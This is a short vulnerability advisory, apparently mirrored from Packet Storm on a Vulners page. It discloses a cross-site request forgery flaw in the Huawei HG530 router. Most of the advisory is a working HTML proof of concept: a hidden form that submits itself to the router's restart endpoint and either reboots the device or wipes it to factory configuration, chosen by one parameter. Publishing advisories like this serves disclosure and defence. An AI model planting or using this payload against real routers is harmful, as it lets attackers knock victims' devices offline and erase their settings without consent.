Lucene search
K

Huawei HG530 Cross Site Request Forgery

🗓️ 06 Jul 2019 00:00:00Reported by Raki Ben HamoudaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 354 Views

Huawei HG530 CSRF reboot and restore vulnerabilit

Code
`Multiple CSRF reboot and restore Vulnerability  
  
===========================  
  
The Huawei HG530 suffers from multiple CSRF vulnerability allows local  
attackers to reboot the device or to restore to factory Configuration.  
  
==================  
  
The vulnerability is located in form POST data parameter in  
'Restart_factory' via path '/Forms/bottom_restart_1'  
  
====================  
  
Security issue PoC :  
  
<html>  
  
<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"  
id='test' >  
  
<input type="hidden" name="defaltRomFlag" value="0">  
  
<input type="hidden" name="defaultIpFactory" value="192.168.1.1">  
  
  
  
<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">  
  
  
  
  
  
</form>  
  
<script>  
  
document.getElementById('test').submit();  
  
</script>  
  
</html>  
  
//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation